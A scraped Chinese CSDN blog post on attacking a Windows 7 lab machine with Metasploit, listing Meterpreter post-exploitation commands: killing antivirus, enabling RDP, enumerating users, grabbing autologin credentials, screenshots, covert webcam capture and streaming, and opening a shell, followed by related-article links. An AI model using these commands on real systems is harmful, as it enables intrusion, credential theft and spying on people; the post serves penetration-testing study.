metasploit攻击windows7

最新推荐文章于 2022-09-01 14:20:17 发布
最新推荐文章于 2022-09-01 14:20:17 发布
阅读量173 收藏 2
点赞数
分类专栏: 笔记 文章标签: 运维 服务器 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45736806/article/details/110671689
版权

metasploit攻击windows7

攻击主机IP:192.168.1.106
目标主机IP:192.168.1.105
在这里插入图片描述
总之只要进来了,就可以做很多事情,大家也可以自己尝试。
例如:

  • 输入background命令将当前会话放到后台
  • 输入getuid命令查看当前目标机器上已经渗透成功的用户名
  • 输入run post/windows/manage/killav命令关闭目标机操作系统
  • 输入run post/windows/manage/enable_rdp命令启动目标机的远程桌面协议,也就是常说的3389端口
  • 输入run post/windows/manage/autoroute命令查看目标机的本地子网情况
  • 输入run post/windows/gather/enum_logged_on_users命令列举当前有多少用户登陆了目标机
  • 输入 run post/windows/gather/enum_applications命令列举安装在目标机上的应用程序
  • run windows/gather/credentials/windows_autologin 抓取用户自动登录的用户名和密码
  • 输入load espia命令加载Espia插件,然后输入screengrab命令就可以抓取此时目标机的屏幕截图
  • webcam_list 查看目标机有没有摄像头
  • 输入webcam_snap命令打开目标机摄像头并拍摄一照片
  • 输入webcam_stream命令甚至还可以开启直播模式
  • 输入shell命令进入目标机shell下面
皓紫萱
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用Metasploit入侵windows之自动扫描
08-07
Metasploit入侵windows之自动扫描方法
Metasploit简单利用及入侵Windows7案例.docx
11-13
Metasploit 入门---漏洞利用实验,攻击机系统:kali linux虚拟机。本文选择MS17_010漏洞(永恒之蓝)和MS08-067漏洞利用来尝试入侵Windows7虚拟机系统,目标机系统:Windows7 x64虚拟机。
metasploit下Windows的多种提权方法
02-25
当你在爱害者的机器上执行一些操作时,发现有一些操作被拒绝执行,为了获得受害机器的完全权限,你需要绕过限制,获取本来没有的一些权限,这些权限可以用来删除文件,查看私有信息,或者安装特殊程序,比如病毒。Metasploit有很多种后渗透方法,可以用于对目标机器的权限绕过,最终获取到系统权限。环境要求:1.攻击机:kalilinux2.目标机:Win7在已经获取到一个meterpretershell后,假如session为1,且权限不是系统权限的前提下,使用以下列出的几种提权方法:本方法主要有以下3个模块。上面这些模块的详细信息在metasploit里已有介绍,这里不再多说,主要说一下使用方法。以e
Msf攻击Win7
07-09
Msf攻击Win7 metasploit
利用Metasploit控制目标电脑(Win7_x64系统)
qq_46700234的博客
12-28 2328
利用Metasploit控制目标电脑(Win7_x64系统)
渗透测试神器之metasploit
weixin_52180702的博客
07-18 2337
metasploit 永恒之蓝漏洞复现
Metasploit扫描3389
qq_53188113的博客
11-15 3901
目录 Metaploit 工具 模块说明 常用的命令 渗透攻击步骤 主机扫描 常用的扫描模块及其功能 Metaploit扫描3389端口 Metaploit 工具 模块说明 1、Auxiliaries(辅助模块):负责执行扫描、嗅探、指纹识别等相关功能,不会建立连接 2、Exploit(漏洞利用模块):核心攻击模块,进行漏洞利用使用攻击代码模块 3、Payload(攻击载荷模块):成功渗透目标后,用于在目标系统上运行任意明林或者执行特定 4、代码Post(后期绳头模块)):取的
Metasploitable渗透测试实战:ms12-020
m0_60121089的博客
05-06 578
1.漏洞描述 ms12-020漏洞的定义是指操作系统的远程桌面协议存在重大漏洞,入侵者(黑客)可以通过向远程桌面默认端口(3389)发一系列特定RDP包,从而获取超级管理员权限,进而入侵系统。(ms12-020漏洞可用于漏洞攻击) 根据实际被入侵终端进行分析,开放远程桌面服务并使用默认的3389端口的会成为攻击目标。 2.实战工具 软件:VMware Workstation 14 攻击机:kali(ip:192.168.240.143) 靶机:win7(ip:192.168.240.159)
【kali-漏洞利用】(3.3)后渗透之Meterpreter(上):命令大全
08-06 3501
【kali-漏洞利用】Meterpreter后渗透
【kali-漏洞利用】(3.3)Metasploit后渗透(下):后渗透模块使用
08-06 641
【kali-漏洞利用】后渗透模块利用
基于Ruby符号执行的Metasploit攻击流量提取
最新发布
03-24
Metasploit 自带大量的攻击脚本,这些脚本的攻击目标涵盖Windows、Linux、Android、iOS 等多种操作系统。同时,Metasploit还提供了多种组件,以支持新攻击脚本的快速开发。Metasploit拥有一个活跃的社区,有众多安全...
116.网络安全渗透测试—[权限提升篇14]—[Windows 2003 Metasploit提权&权限维持&开启3389]
qwsn
07-08 2500
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 【图略】#键入 启动 metasploit #进入监听模块 #查看系统信息 #查看进程 pid #迁移进程 #当前用户
Metasploit渗透测试学习笔记——6、Meterpreter
Fly_鹏程万里
05-16 2520
这次我们通过对Metasploitable 2进行一个渗透攻击,之后使用Meterpreter进行讲解Meterpreter的使用渗透Metasploitable 2服务枚举模块使用查看配置选项设置攻击目标主机IP地址开始攻击可以看到成功返回一个MeterpreterMeterpreter命令项查看使用"help"查看Meterpreter命令选择项Meterpreter命令详解基本命令1、bac...
Metasploit渗透测试框架的基本使用
weixin_68281676的博客
09-01 1582
msf渗透攻击的使用
MS12——020漏洞复现
m0_56267052的博客
04-11 418
MS12_020 开启靶机3389端口 开启远程桌面服务 第三、 Win7: 查看3389端口是否开启 Kali: Ping的通,表示两个电脑可以连通 进入metasploit渗透测试平台 搜索漏洞 auxiliary/scanner/rdp/ms12_020_check ------用来扫描判断靶机是否存在ms12_020漏洞 auxiliary/dos/windows/rdp/ms12_020_ma..
预警!3389摊事了!Metasploit已集成BlueKeep漏洞攻击EXP代码
xhhhhhhhhh的博客
09-07 1247
今天(2019年9月7日),著名漏洞攻击套件Metasploit已经集成了BlueKeep漏洞(CVE-2019-0708)攻击EXP代码,由于该漏洞危害严重,后续极易造成类似WannaCry类蠕虫病毒的大范围传播。因此,请还未升级该漏洞补丁的用户尽快升级,避免后续可能出现的各类攻击造成损失。 漏洞利用代码链接:https://github.com/rapid7/metasploit-frame...
kali攻防第12章 Metasploit服务器蓝屏攻击
安全参透之旅
12-24 1万+
Metasploit服务器蓝屏攻击   准备工具 1、kali 系统 IP:10.10.10.131 2、受害者机子 IP: 10.10.10.130 3、工具 Metasploit 4、服务器开启3389端口   步骤: 1、进入Metasploit控制台 root@kali:~# msfconsole
利用MS17-010渗透win7(32位)
热门推荐
1stPeak's Blog
06-07 2万+
MS17-010就是我们常说的永恒之蓝漏洞 1.首先我们测试目标系统是否存在该漏洞 2.永恒之蓝漏洞利用前的准备与之后的实施 3.问题总结 4.如果使用该模块攻击win7x64注意事项 这篇文章主要写的是对win7(x86)系统的渗透,x64的请点击这里利用MS17-010渗透win7(64位),我们这里的环境是攻击者(IP:192.168.1.222),靶机(IP:192.168.1.221)...
Metasploit入侵win7
qq_53030229的博客
11-07 1787
文章目录一、Metasploit是什么?1、Auxiliaries(辅助模块)2、Exploit(渗透攻击模块)3、payload(攻击载荷模块)4、Post(后期渗透模块)5、Encoder(编码工具模块)二、Metasploit入侵步骤1.引入库2.读入数据 一、Metasploit是什么? 这里我简单介绍一下,方便你们小白了解(大佬直接跳过就行) Metasploit框架是一个开源工具,旨在方便渗透测试,他是有ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发,使用定制的工具模板
怎么用metasploit攻击windows10
06-11
使用Metasploit攻击Windows 10的步骤如下: 1. 扫描目标主机:使用Metasploit的扫描器模块(如`nmap`)扫描目标主机,获取目标主机的操作系统版本、开放的端口和服务等信息。 2. 选择适合的漏洞和攻击模块:在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值